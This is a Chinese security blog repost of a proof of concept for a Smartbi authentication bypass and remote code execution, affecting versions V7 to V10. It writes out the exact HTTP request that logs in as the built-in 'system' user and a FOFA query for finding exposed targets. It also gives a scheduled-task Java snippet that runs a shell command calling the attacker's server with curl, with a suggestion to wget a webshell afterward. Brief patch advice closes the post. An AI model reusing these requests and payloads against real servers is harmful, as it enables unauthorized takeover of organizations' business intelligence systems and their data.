Smartbi内置用户登陆绕过以及getshell PoC

admin 2024年10月29日14:06:10评论23 views字数 1817阅读6分3秒阅读模式

Smartbi内置用户登陆绕过以及getshell PoC

Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策,满⾜⽤户在企业级报表、数据可视化分析、⾃助分析平台、数据挖掘建模、AI智能分析等⼤数据分析需求。该软件应⽤范围较⼴,据官⽹的介绍内容,在全球财富500强的10家国内银⾏,有8家选⽤了Smartbi,该漏洞影响比较广。

Smartbi内置用户登陆绕过以及getshell PoC
01

漏洞概述

Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。

02

影响范围

V7 <= Smartbi <= V10
03

复现环境

FOFA:app="SMARTBI"
04

漏洞验证

验证漏洞是否存在

http://xxx.xxx.xxx/vision/RMIServlet
Smartbi内置用户登陆绕过以及getshell PoC

出现以上这种情况,则存在漏洞。

POST /vision/RMIServlet HTTP/1.1Host: xxx.xxx.xxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=56FBB60CB402554EF9AB272384FD4202Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 67className=UserService&methodName=loginFromDB&params=["system","0a"]
Smartbi内置用户登陆绕过以及getshell PoC

带着箭头标注的cookie去首页刷新即可以system权限进入后台。

Smartbi内置用户登陆绕过以及getshell PoC

Smartbi内置用户登陆绕过以及getshell PoC

nuclei-templates:https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/smartbi/smartbi-default-user.yamlnuclei检测:./nuclei -u http://xxx.xxx.com/ -t ./ultimaste-nuclei-templates/smartbi/smartbi-default-user.yaml

进个后台这就没了?怎么可能没了,多个公众号都强调了可RCE速修。

Smartbi内置用户登陆绕过以及getshell PoC

那么咱来看看是怎么RCE的,这个系统后台功能比较多,找了找容易出问题的功能,系统运维->常用工具->计划任务。

Smartbi内置用户登陆绕过以及getshell PoC

新建任务,任务类型选择定制,在⾃定义设置⽂本下输⼊java语句

Smartbi内置用户登陆绕过以及getshell PoC

dnslog探测语句:

importPackage(Packages.java.lang);importPackage(Packages.java.io);importPackage(Packages.smartbi.repository);importPackage(Packages.smartbi.util);importPackage(Packages.java.util);builder = new ProcessBuilder();builder.command("sh", "-c", "sudo curl http://ip");builder.directory(new File(System.getProperty("user.home")));process = builder.start();
执⾏语句,观察vps  http记录

Smartbi内置用户登陆绕过以及getshell PoC

访问web,确定是否下载成功。

Smartbi内置用户登陆绕过以及getshell PoC

能出网就简单了,wget一个马进去。

Smartbi内置用户登陆绕过以及getshell PoC

05

修复建议

在确认不影响业务的前提下,删除内置的几个账号(public、service、system)。官方已发布升级补丁包,支持在线升级和离线补丁安装。https://www.smartbi.com.cn/patchinfo
 

原文始发于微信公众号(星网实验室):Smartbi内置用户登陆绕过以及getshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月29日14:06:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Smartbi内置用户登陆绕过以及getshell PoChttps://cn-sec.com/archives/1864492.html

发表评论

匿名网友 填写信息